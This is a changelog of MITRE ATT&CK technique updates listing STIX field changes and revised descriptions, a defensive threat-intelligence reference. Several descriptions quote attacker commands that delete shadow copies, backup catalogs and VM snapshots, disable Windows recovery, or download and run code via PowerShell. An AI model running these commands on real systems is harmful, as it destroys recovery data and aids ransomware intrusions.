modified | 2024-10-15 15:59:22.125000+00:00 | 2025-04-15 19:58:43.436000+00:00 |
x_mitre_version | 2.2 | 2.3 |
x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1027.005] Obfuscated Files or Information: Indicator Removal from Tools
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'Log analysis', 'Signature-based detection'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-28 16:07:48.062000+00:00 | 2025-04-16 20:37:19.031000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1202] Indirect Command Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
t | Adversaries may abuse utilities that allow for command execu | t | Adversaries may abuse utilities that allow for command execu |
| tion to bypass security restrictions that limit the use of c | | tion to bypass security restrictions that limit the use of c |
| ommand-line interpreters. Various Windows utilities may be u | | ommand-line interpreters. Various Windows utilities may be u |
| sed to execute commands, possibly without invoking [cmd](htt | | sed to execute commands, possibly without invoking [cmd](htt |
| ps://attack.mitre.org/software/S0106). For example, [Forfile | | ps://attack.mitre.org/software/S0106). For example, [Forfile |
| s](https://attack.mitre.org/software/S0193), the Program Com | | s](https://attack.mitre.org/software/S0193), the Program Com |
| patibility Assistant (pcalua.exe), components of the Windows | | patibility Assistant (`pcalua.exe`), components of the Windo |
| Subsystem for Linux (WSL), Scriptrunner.exe, as well as oth | | ws Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as |
| er utilities may invoke the execution of programs and comman | | other utilities may invoke the execution of programs and co |
| ds from a [Command and Scripting Interpreter](https://attack | | mmands from a [Command and Scripting Interpreter](https://at |
| .mitre.org/techniques/T1059), Run window, or via scripts.(Ci | | tack.mitre.org/techniques/T1059), Run window, or via scripts |
| tation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfil | | .(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Fo |
| es Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citat | | rfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(C |
| ion: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) | | itation: SS64)(Citation: Bleeping Computer - Scriptrunner.ex |
| Adversaries may abuse these features for [Defense Evasion](h | | e) Adversaries may also abuse the `ssh.exe` binary to execut |
| ttps://attack.mitre.org/tactics/TA0005), specifically to per | | e malicious commands via the `ProxyCommand` and `LocalComman |
| form arbitrary execution while subverting detections and/or | | d` options, which can be invoked via the `-o` flag or by mod |
| mitigation controls (such as Group Policy) that limit/preven | | ifying the SSH config file.(Citation: Threat Actor Targets t |
| t the usage of [cmd](https://attack.mitre.org/software/S0106 | | he Manufacturing industry with Lumma Stealer and Amadey Bot) |
| ) or file extensions more commonly associated with malicious | | Adversaries may abuse these features for [Defense Evasion] |
| payloads. | | (https://attack.mitre.org/tactics/TA0005), specifically to p |
| | | erform arbitrary execution while subverting detections and/o |
| | | r mitigation controls (such as Group Policy) that limit/prev |
| | | ent the usage of [cmd](https://attack.mitre.org/software/S01 |
| | | 06) or file extensions more commonly associated with malicio |
| | | us payloads. |
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Static File Analysis', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-03 14:47:17.154000+00:00 | 2025-04-15 19:58:23.859000+00:00 |
description | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot', 'description': 'Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025.', 'url': 'https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/'} |
[T1105] Ingress Tool Transfer
Current version: 2.5
Version changed from: 2.4 → 2.5
|
|
t | Adversaries may transfer tools or other files from an extern | t | Adversaries may transfer tools or other files from an extern |
| al system into a compromised environment. Tools or files may | | al system into a compromised environment. Tools or files may |
| be copied from an external adversary-controlled system to t | | be copied from an external adversary-controlled system to t |
| he victim network through the command and control channel or | | he victim network through the command and control channel or |
| through alternate protocols such as [ftp](https://attack.mi | | through alternate protocols such as [ftp](https://attack.mi |
| tre.org/software/S0095). Once present, adversaries may also | | tre.org/software/S0095). Once present, adversaries may also |
| transfer/spread tools between victim devices within a compro | | transfer/spread tools between victim devices within a compro |
| mised environment (i.e. [Lateral Tool Transfer](https://atta | | mised environment (i.e. [Lateral Tool Transfer](https://atta |
| ck.mitre.org/techniques/T1570)). On Windows, adversaries m | | ck.mitre.org/techniques/T1570)). On Windows, adversaries m |
| ay use various utilities to download tools, such as `copy`, | | ay use various utilities to download tools, such as `copy`, |
| `finger`, [certutil](https://attack.mitre.org/software/S0160 | | `finger`, [certutil](https://attack.mitre.org/software/S0160 |
| ), and [PowerShell](https://attack.mitre.org/techniques/T105 | | ), and [PowerShell](https://attack.mitre.org/techniques/T105 |
| 9/001) commands such as <code>IEX(New-Object Net.WebClient). | | 9/001) commands such as <code>IEX(New-Object Net.WebClient). |
| downloadString()</code> and <code>Invoke-WebRequest</code>. | | downloadString()</code> and <code>Invoke-WebRequest</code>. |
| On Linux and macOS systems, a variety of utilities also exis | | On Linux and macOS systems, a variety of utilities also exis |
| t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, | | t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, |
| and `wget`.(Citation: t1105_lolbas) Adversaries may also a | | and `wget`.(Citation: t1105_lolbas) A number of these tool |
| buse installers and package managers, such as `yum` or `wing | | s, such as `wget`, `curl`, and `scp`, also exist on ESXi. Af |
| et`, to download tools to victim hosts. Adversaries have als | | ter downloading a file, a threat actor may attempt to verify |
| o abused file application features, such as the Windows `sea | | its integrity by checking its hash value (e.g., via `certut |
| rch-ms` protocol handler, to deliver malicious files to vict | | il -hashfile`).(Citation: Google Cloud Threat Intelligence C |
| ims through remote file searches invoked by [User Execution] | | OSCMICENERGY 2023) Adversaries may also abuse installers an |
| (https://attack.mitre.org/techniques/T1204) (typically after | | d package managers, such as `yum` or `winget`, to download t |
| interacting with [Phishing](https://attack.mitre.org/techni | | ools to victim hosts. Adversaries have also abused file appl |
| ques/T1566) lures).(Citation: T1105: Trellix_search-ms) Fil | | ication features, such as the Windows `search-ms` protocol h |
| es can also be transferred using various [Web Service](https | | andler, to deliver malicious files to victims through remote |
| ://attack.mitre.org/techniques/T1102)s as well as native or | | file searches invoked by [User Execution](https://attack.mi |
| otherwise present tools on the victim system.(Citation: PTSe | | tre.org/techniques/T1204) (typically after interacting with |
| curity Cobalt Dec 2016) In some cases, adversaries may be ab | | [Phishing](https://attack.mitre.org/techniques/T1566) lures) |
| le to leverage services that sync between a web-based and an | | .(Citation: T1105: Trellix_search-ms) Files can also be tra |
| on-premises client, such as Dropbox or OneDrive, to transfe | | nsferred using various [Web Service](https://attack.mitre.or |
| r files onto victim systems. For example, by compromising a | | g/techniques/T1102)s as well as native or otherwise present |
| cloud account and logging into the service's web portal, an | | tools on the victim system.(Citation: PTSecurity Cobalt Dec |
| adversary may be able to trigger an automatic syncing proces | | 2016) In some cases, adversaries may be able to leverage ser |
| s that transfers the file onto the victim's machine.(Citatio | | vices that sync between a web-based and an on-premises clien |
| n: Dropbox Malware Sync) | | t, such as Dropbox or OneDrive, to transfer files onto victi |
| | | m systems. For example, by compromising a cloud account and |
| | | logging into the service's web portal, an adversary may be a |
| | | ble to trigger an automatic syncing process that transfers t |
| | | he file onto the victim's machine.(Citation: Dropbox Malware |
| | | Sync) |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 15:08:01.731000+00:00 | 2025-04-15 19:59:17.217000+00:00 |
description | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync) | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync) |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Google Cloud Threat Intelligence COSCMICENERGY 2023', 'description': 'COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises. (2023, May 25). Ken Proska, Daniel Kapellmann Zafra, Keith Lunden, Corey Hildebrandt, Rushikesh Nandedkar, Nathan Brubaker. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/cosmicenergy-ot-malware-russian-response/'} |
x_mitre_contributors | | Peter Oakes |
x_mitre_platforms | | ESXi |
[T1490] Inhibit System Recovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-24 13:27:31.881000+00:00 | 2025-04-15 19:59:22.100000+00:00 |
description (old value):
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`
* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`
* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`
* `REAgentC.exe` can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* `diskshadow.exe` can be used to delete all volume shadow copies on a system - `diskshadow delete shadows all` (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
description (new value):
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`
* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`
* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`
* `REAgentC.exe` can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* `diskshadow.exe` can be used to delete all volume shadow copies on a system - `diskshadow delete shadows all` (Citation: Diskshadow) (Citation: Crytox Ransomware)
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
On ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486), preventing them from being leveraged as backups (e.g., via `vim-cmd vmsvc/snapshot.removeall`).(Citation: Cybereason)
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Cybereason', 'description': 'Cybereason Nocturnus. (n.d.). Cybereason vs. BlackCat Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware'} |
x_mitre_platforms | | ESXi |
[T1056] Input Capture
Current version: 1.4
Version changed from: 1.3 → 1.4
New Detections:
- DS0011: Module (Module Load)
- DS0017: Command (Command Execution)
- DS0022: File (File Creation)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-13 17:33:45.244000+00:00 | 2025-04-15 19:59:02.160000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Module: Module Load |
x_mitre_data_sources | | File: File Creation |
x_mitre_data_sources | | Command: Command Execution |
x_mitre_platforms | | Network Devices |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1553.004] Subvert Trust Controls: Install Root Certificate
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-04 20:01:27.662000+00:00 | 2025-04-15 19:59:06.251000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1218.004] System Binary Proxy Execution: InstallUtil
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 18:47:52.603000+00:00 | 2025-04-15 19:58:17.302000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1546.016] Event Triggered Execution: Installer Packages
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['root'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-28 15:52:44.332000+00:00 | 2025-04-15 19:59:13.167000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1559] Inter-Process Communication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-10 19:06:35.666000+00:00 | 2025-04-15 19:58:57.325000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1491.001] Defacement: Internal Defacement
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-28 18:55:35.988000+00:00 | 2025-04-15 19:58:49.776000+00:00 |
description | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware) |
external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
external_references[1]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
x_mitre_platforms | | ESXi |
[T1090.001] Proxy: Internal Proxy
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-07 14:29:02.408000+00:00 | 2025-04-15 19:59:22.365000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1016.001] System Network Configuration Discovery: Internet Connection Discovery
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-25 17:03:26.632000+00:00 | 2025-04-15 19:58:08.048000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1001.001] Data Obfuscation: Junk Data
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-02 20:10:01.862000+00:00 | 2025-04-15 19:59:22.822000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1558.003] Steal or Forge Kerberos Tickets: Kerberoasting
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Valid domain account or the ability to sniff traffic within a domain'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-23 22:20:10.994000+00:00 | 2025-04-15 19:59:20.912000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1547.006] Boot or Logon Autostart Execution: Kernel Modules and Extensions
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 17:30:54.170000+00:00 | 2025-04-15 19:58:54.982000+00:00 |
external_references[7]['description'] | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018. | Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved November 17, 2024. |
external_references[7]['url'] | http://tldp.org/HOWTO/Module-HOWTO/x197.html | https://tldp.org/HOWTO/Module-HOWTO/x197.html |
external_references[12]['description'] | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018. | Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved November 17, 2024. |
external_references[12]['url'] | http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html | https://tldp.org/LDP/lkmpg/2.4/html/x437.html |
external_references[17]['description'] | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018. | Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved November 17, 2024. |
external_references[17]['url'] | https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ | https://objective-see.org/blog/blog_0x21.html |
x_mitre_version | 1.3 | 1.4 |
[T1056.001] Input Capture: Keylogging
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-01 14:01:12.167000+00:00 | 2025-04-15 19:58:03.923000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
[T1546.006] Event Triggered Execution: LC_LOAD_DYLIB Addition
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 17:08:21.101000+00:00 | 2025-04-16 20:37:15.460000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1547.008] Boot or Logon Autostart Execution: LSASS Driver
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 16:34:43.405000+00:00 | 2025-04-16 20:37:22.686000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1570] Lateral Tool Transfer
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-01 13:48:28.738000+00:00 | 2025-04-15 19:59:03.832000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1543.001] Create or Modify System Process: Launch Agent
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-21 16:13:00.598000+00:00 | 2025-04-15 19:59:10.035000+00:00 |
external_references[6]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
external_references[6]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
